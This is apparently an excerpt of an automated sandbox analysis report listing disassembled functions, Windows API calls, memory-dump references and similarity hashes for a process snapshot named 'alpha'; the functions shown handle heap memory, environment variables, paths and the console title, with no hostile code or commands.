                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1403193329-0
                                                                                                                                                                        • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                                                                        • Instruction ID: b3fa9b21cb5155f41ee51955f32ccf242236cfbbf832bdeb7c7a47d0c483f8a6
                                                                                                                                                                        • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C51A027A09682C5EB25DF3098097BA77B0FF49B58F458135CA0D87694EE3ED54CC70A
                                                                                                                                                                        Function 00007FF6E944E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2123716050-0
                                                                                                                                                                        • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                                                                                                        • Instruction ID: 6a74fab02a1f0d28e1f356b3ed3f6fe3f1767ec2acd278ce82177189d1a1a94e
                                                                                                                                                                        • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                                                                                                        • Instruction Fuzzy Hash: 47418933709AC2CAEB768F21D8543E927A4EF49B88F444134DA4D8AA98DE3DD249C705
                                                                                                                                                                        Function 00007FF6E94332E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E94333A8: iswspace.MSVCRT(?,?,00000000,00007FF6E944D6EE,?,?,?,00007FF6E9440632), ref: 00007FF6E94333C0
                                                                                                                                                                        • iswspace.MSVCRT(?,?,?,00007FF6E94332A4), ref: 00007FF6E943331C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswspace
                                                                                                                                                                        • String ID: off
                                                                                                                                                                        • API String ID: 2389812497-733764931
                                                                                                                                                                        • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                        • Instruction ID: c5f65b2d97c090f4b4ea1a4f1c25f9cc56675cff7fdb8bff946d33e9c3969f13
                                                                                                                                                                        • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B213623E0C647C2FA649F75A45937A66A0EF45F90F98C134DD0AC7681DE2EE848C30A
                                                                                                                                                                        Function 00007FF6E9449308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                        • String ID: %s=%s$DPATH$PATH
                                                                                                                                                                        • API String ID: 3731854180-3148396303
                                                                                                                                                                        • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                        • Instruction ID: 7a47398dabc748fbbe14b36771e5c1966389367f6e7845549214a74ccfe482b6
                                                                                                                                                                        • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                        • Instruction Fuzzy Hash: 5D215B23B09656C1EB64DFA5E44037927A0AF89F80F884135DD0EC7395EE3EE549CB4A
                                                                                                                                                                        Function 00007FF6E9438198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscmp
                                                                                                                                                                        • String ID: *.*$????????.???
                                                                                                                                                                        • API String ID: 3392835482-3870530610
                                                                                                                                                                        • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                        • Instruction ID: efaf3a1b58be26ece150d6756f1c115eec6304c6c10baa4a80f4dbd39f54c2f6
                                                                                                                                                                        • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                        • Instruction Fuzzy Hash: C8115226B18A52C1EB64CF37A44467DB2A1EF48B80F195031DE8D87B85DE3EE445C705
                                                                                                                                                                        Function 00007FF6E9426A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E9433D0C
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: towupper.MSVCRT ref: 00007FF6E9433D2F
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: iswalpha.MSVCRT ref: 00007FF6E9433D4F
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: towupper.MSVCRT ref: 00007FF6E9433D75
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9433DBF
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9426ABF
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9426AD3
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF6E9426AE8,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B8B
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF6E9426AE8,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B97
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B84: RtlFreeHeap.NTDLL ref: 00007FF6E9426BAF
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9426AF1,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B39
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B30: RtlFreeHeap.NTDLL ref: 00007FF6E9426B4D
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9426AF1,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B59
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9426B03
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9426B17
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3512109576-0
                                                                                                                                                                        • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                        • Instruction ID: 23ce1be0056c7fe227dc4f94e2deeb969b17616cb3320d4c40f024db73ebf4b4
                                                                                                                                                                        • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                        • Instruction Fuzzy Hash: B1218E63A09A86C6EB04DF6594543B87BA0FF59B45F148032CA0EC7355EF3EA44AC31A
                                                                                                                                                                        Function 00007FF6E942B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B6D0
                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B6E7
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B701
                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B715
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$AllocSize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2549470565-0
                                                                                                                                                                        • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                        • Instruction ID: d7072537c0516c7a496935c98e734932356321587ea3ed7546fa5a7b06870fbb
                                                                                                                                                                        • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B211F77A09782C6EA148F55E440278BAA5FF89B80B589431DA0E83754EF3DE849C709
                                                                                                                                                                        Function 00007FF6E9445690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6E9445433,?,?,?,00007FF6E94469B8,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94456C5
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E94456D9
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6E9445433,?,?,?,00007FF6E94469B8,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94456FD
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9445711
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                        • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                        • Instruction ID: 67d30fe882b0f2402c607739c5c18ba23279a5c016b85e152fa12516c14bfebc
                                                                                                                                                                        • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                        • Instruction Fuzzy Hash: 8D11F572A04B91C6EB008F56E4441ADBBB0FB89F84B598125DB4E43728EF38E45AC744
                                                                                                                                                                        Function 00007FF6E9439158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 140117192-0
                                                                                                                                                                        • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                        • Instruction ID: 82cc835333b58ddb4b5ef44f61bc9ac8831998dc97b3b6812f151f29c402abf3
                                                                                                                                                                        • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                        • Instruction Fuzzy Hash: BE21AF36918B45C5EB40AF94E88436973A4FF88B54F500136EA8D82764DF7EE488CB0A
                                                                                                                                                                        Function 00007FF6E9434AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AD6
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AEF
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E943EE64
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E943EE78
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2759988882-0
                                                                                                                                                                        • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                        • Instruction ID: a5950dd76105495b22b0fc352e10142c80102530ac2d1e3d05b86dbded8bf74c
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                        • Instruction Fuzzy Hash: 5FF0E762E19A42C6EF159FB6A409279A9D1FF8EB41F48D434CD0EC2350EE3EA448C716
                                                                                                                                                                        Function 00007FF6E942CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleTitle
                                                                                                                                                                        • String ID: -
                                                                                                                                                                        • API String ID: 3358957663-3695764949
                                                                                                                                                                        • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                        • Instruction ID: 3a60c092abcbd971b29546b1336eca61d18b1a132e2828b74c432a3209b373e5
                                                                                                                                                                        • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                        • Instruction Fuzzy Hash: 8731A163A08742C2EA14DF21A8046786AA4FF49F91F545235DD0E87BD6DF3EE449C30E
                                                                                                                                                                        Function 00007FF6E9437280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
